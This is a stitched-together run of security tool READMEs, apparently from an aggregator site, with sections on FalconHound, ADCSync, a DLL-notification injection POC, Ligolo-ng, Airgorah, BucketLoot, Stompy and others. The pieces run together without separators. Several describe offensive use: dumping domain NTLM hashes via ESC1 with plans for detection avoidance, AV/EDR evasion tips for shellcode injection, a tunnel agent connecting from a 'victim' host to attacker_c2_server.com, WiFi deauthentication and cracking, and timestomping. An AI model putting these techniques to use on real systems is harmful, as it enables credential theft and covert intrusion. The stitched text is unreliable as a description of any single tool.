This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
Query
The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Targets
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.
- Name: Neo4j Enabled: true Query: | MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound' Parameters: Computer: Computer TargetUserSid: TargetUserSid Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
Sentinel
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is why also query output needs to be controlled, you might otherwise flood your target.
- Name: Sentinel Enabled: true
Sentinel Watchlists
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.
The SearchKey field is the column that will be used as the search key.
The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Splunk
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk Enabled: true
Azure Data Explorer
Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX Enabled: true Table: "name"
Extensions to the graph
Relationship: HadSession
Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
Properties
FalconHound will add the following properties to nodes in the graph:
Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids
Credential management
The currently supported ways of providing FalconHound with credentials are:
Via the config.yml file on disk.
Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
Mixed mode.
Config.yml
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.
The required permissions for your AppID/AppSecret are listed here.
Keyvault
A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
Once configured you can add the -keyvault parameter while starting FalconHound.
Mixed mode / fallback
When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
Deployment
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
Sharphound / Azurehound
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
License
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
Installation
git clone https://github.com/JPG0mez/adcsync.git cd adcsync pip3 install -r requirements.txt
Usage
To use this tool we need the following things:
Valid Domain Credentials
A user list from a bloodhound dump that will be passed in.
A template vulnerable to ESC1 (Found with Certipy find)
Options: -f, --file TEXT Input User List JSON file from Bloodhound [required] -o, --output TEXT NTLM Hash Output file [required] -ca TEXT Certificate Authority [required] -dc-ip TEXT IP Address of Domain Controller [required] -u, --user TEXT Username [required] -p, --password TEXT Password [required] -template TEXT Template Name vulnerable to ESC1 [required] -target-ip TEXT IP Address of th e target machine [required] --help Show this message and exit.
TODO
Support alternative authentication methods such as NTLM hashes and ccache files
Automatically run "certipy find" to find and grab templates vulnerable to ESC1
Add jitter and sleep options to avoid detection
Add type validation for all variables
Acknowledgements
puzzlepeaches: Telling me to hurry up and write this
The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.
The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.
Prerequisites
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
Windows
On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
Linux
The libkrb5-dev package needs to be installed prior to installing python requirements
All
Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool
pip install -r requirements.txt
Enumeration Mode
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.
Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
Example
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret! [=] Found 2 non Windows machines registered within AD [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS Mode
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.
Examples
Adding a DNS A record for host ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50 [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com [=] Adding A record for target ahost using data 192.168.128.50 [+] Applied 1 updates successfully
Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com. [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com [=] Adding PTR record for target 50 using data ahost.ad.ginge.com. [+] Applied 1 updates successfully
Forward and reverse DNS lookup results after execution
DllNotificationInection is a POC of a new “threadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
OPSEC Notes
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.
Acknowledgments
@C5pider for his ShellcodeTemplate project which which was used to create the trampoline shellcode. Also, for Havoc C2 that was used in the POC Demo Video.
Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.
Whats New?:
Uscrapper 2.0:
Introduced multiple modules to bypass anti-webscrapping techniques.
Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
Implemented Multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars: VAR_NAME: value ANOTHER_VAR: another_value # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
Inspiration of this project comes from Awesome taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
⭐ Don't forget to put a star if you like the project!
Legal
Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.
Requirements
This software only works on linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your chatgpt api key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
Create a file named ‘domains.txt’. Type in a line-separated list of domains you’d like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
Run antisquat using python3.8 antisquat.py domains.txt
Examples:
Let’s say you’d like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
Test case:
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
SYN are translated to connect() on remote
SYN-ACK is sent back if connect() succeed
RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go $ go build -o proxy cmd/proxy/main.go # Build for Windows $ GOOS=windows go build -o agent.exe cmd/agent/main.go $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo $ sudo ip link set ligolo up
Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans) ;
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --org-name ORG_NAME Organization name to download the workflows
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --max-stars MAX_STARS Maximum number of stars for a repository --min-stars MIN_STARS Minimum number of stars for a repository, default : 1000
It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode
If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.
The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
Features
Secret Scanning
Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
Sensitive File Checks
Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
T1059.003
T1027,T1049,T1003
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
TODO
Must have
Check if pre-reqs have been fullfilled before executing the atomic
Provide the ability to import own group policy
Cleanup biceps and pipelines by using a master template (Complete build)
Build pipeline that runs technique sequently with reboots in between
Add Azure ServiceConnection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make Atomics repository configureable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not return if a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.